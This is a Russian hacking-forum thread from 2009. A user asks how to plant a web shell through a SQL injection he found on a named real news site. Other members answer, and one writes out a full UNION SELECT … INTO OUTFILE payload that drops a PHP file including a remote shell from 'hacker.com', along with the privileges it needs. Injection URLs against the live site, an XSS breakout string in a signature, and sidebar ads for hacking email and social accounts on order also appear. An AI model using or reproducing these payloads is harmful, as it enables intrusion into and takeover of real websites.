Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - шел в sql inj??? Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / WEB сайтов RSS подписка на сообщения с форума Subscribe Модераторы: RenGO, Bb0y, B3JIoMep, BRUNOTTI, Virous, xssmailcom
Технологии взлома сайтов - xss, sql injection. Для сообщений "взломайте мне сайт" есть форум "Предложения работы".

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Страницы сообщения: [1] [2] Просмотров - 7592
шел в sql inj???
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
s0llo




Member
# | Сообщение добавлено 18.11.2009 23:46:50
есть сайт где найдена sql inj, на сайте ни где не нашел через что можно залить шел... как можно сделать это вручную или какая для этого есть команда?
вот пример
 
http://www.*****.ru/?page=frend&birs_id=-79+union+select+1,2,3,4,5,6,7
 
активные поля 5 и 6
отпишите пожалуйста в такомже примере!!!
 
Я изменил бы мир, но Бог не дает исходники...
Сказать спасибо Ответить Цитировать

Bb0y



Moderator
Elite
# | Сообщение добавлено 18.11.2009 23:52:20
Отредактировано 19.11.2009 00:01:04 by Bboy
Читай статьи и способ залить вэб шелл через запросы into outfile.
Примечание: для реализации необходимы права типа file_priv (Y)

 
Tix. Помним, скорбим.
Сказать спасибо Ответить Цитировать

s0llo




Member
# | Сообщение добавлено 19.11.2009 00:08:05
ткни пожалуйста носом меня в эти статьи, а то я что то затрудняюсь найти где это описано(((
 
Я изменил бы мир, но Бог не дает исходники...
Сказать спасибо Ответить Цитировать

superhacker




Elite
# | Сообщение добавлено 19.11.2009 00:14:08
http://tinyurl.com/yayc2c6
 
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 19.11.2009 00:42:15
http://tinyurl.com/ycnvjd9 Суть будет ясна.
 
javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">
Сказать спасибо Ответить Цитировать

s0llo




Member
# | Сообщение добавлено 20.11.2009 00:53:11
ничего не выходит! может я что не правильно делаю???
http://www.mediasoyuz.ru/news/index.php?id=-66+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--
 

можноли сюда залить шелл? и как проверить file_priv?
 
Я изменил бы мир, но Бог не дает исходники...
Сказать спасибо Ответить Цитировать

superhacker




Elite
# | Сообщение добавлено 20.11.2009 00:54:21
https://www.hackzone.ru/articles/view/id/6591/
 
Сказать спасибо Ответить Цитировать

s0llo




Member
# | Сообщение добавлено 20.11.2009 01:11:30
да... это понятно, но в админке сайта нет формы уплоад(для загрузки картинок и т.д.) как мне залить шелл с помощью sql inj ???
 
Я изменил бы мир, но Бог не дает исходники...
Сказать спасибо Ответить Цитировать

Viglim23




Gold Member
# | Сообщение добавлено 20.11.2009 08:17:01
http://www.mediasoyuz.ru/news/index.php?id=-66+union+select+1,'<?php include("http://hacker.com/shell.txt"); ?>',3,4,5,6,7,8,9,10,11,12,13+FROM+DUAL+INTO+OUTFILE+'/var/www/mediasouyz.ru/shell.php'--
Путь к шелу и папке с веб-документами соответственно другой. Чтобы это провернуть нужны права учетки мускуля FILE_PRIV права на запись в папку, доступную из веба для юзера из под-которого работает веб-сервер и отключенное экранирование кавычек (magic_quotes_gpc)
 
Придуманным миром удобней управлять.
Сказать спасибо Ответить Цитировать

s0llo




Member
# | Сообщение добавлено 20.11.2009 18:10:14
ага так вроде понятно! буду пробовать... Если есть еще способы, можете отписать их как было написано выше!
 
Я изменил бы мир, но Бог не дает исходники...
Сказать спасибо Ответить Цитировать

Страницы сообщения: [1] [2]
Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Ищу работу » Re: Взлом емейлов, вконтакте, одноклассники
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом ВКонтакте на заказ. Взлом почты на заказ.
  • Интернет / Разное » SOCKS 4/5, HTTPS прокси сервис - proxybuy
  • Программирование / WEB Design » Уроки по JavaScript для начинающих
  • Разное / Ищу работу » Re: Прогон 7ым XRumerоm по форумам, блогам, гостевым. ru и e...
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Предложения работы » Нужен способ заработка, майнинга

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}